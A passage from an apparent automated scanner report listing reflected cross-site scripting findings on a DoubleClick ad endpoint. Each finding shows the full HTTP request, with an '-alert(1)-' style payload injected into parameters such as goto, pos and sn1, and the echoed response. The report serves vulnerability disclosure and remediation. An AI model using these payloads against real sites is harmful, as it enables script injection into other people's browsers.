GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.14. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61f0c"-alert(1)-"f906c58d3ba was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=61f0c"-alert(1)-"f906c58d3ba HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=61f0c"-alert(1)-"f906c58d3bahttp://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c92'-alert(1)-'1edd0185642 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=78c92'-alert(1)-'1edd0185642 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=78c92'-alert(1)-'1edd0185642http://www.unum.com/voluntary\">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c26ac"-alert(1)-"4050e370dbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&c26ac"-alert(1)-"4050e370dbe=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:42:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6473

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&c26ac"-alert(1)-"4050e370dbe=1http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
va
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3d94'-alert(1)-'1f7a615340a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&d3d94'-alert(1)-'1f7a615340a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:42:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6473

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&d3d94'-alert(1)-'1f7a615340a=1http://www.unum.com/voluntary\">
...[SNIP]...

4.18. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 411c7'-alert(1)-'2d5dec84db9 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post411c7'-alert(1)-'2d5dec84db9&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post411c7'-alert(1)-'2d5dec84db9&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.19. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a6ae"-alert(1)-"34c68b6b7ed was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post3a6ae"-alert(1)-"34c68b6b7ed&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post3a6ae"-alert(1)-"34c68b6b7ed&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
va
...[SNIP]...

4.20. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3ecc"-alert(1)-"751fd290be4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAdf3ecc"-alert(1)-"751fd290be4&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
3%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAdf3ecc"-alert(1)-"751fd290be4&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

4.21. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479c8'-alert(1)-'10d3faac88e was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd479c8'-alert(1)-'10d3faac88e&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
3%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd479c8'-alert(1)-'10d3faac88e&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.22. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e249'-alert(1)-'67112d083f4 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb9e249'-alert(1)-'67112d083f4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
x_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb9e249'-alert(1)-'67112d083f4&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.23. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

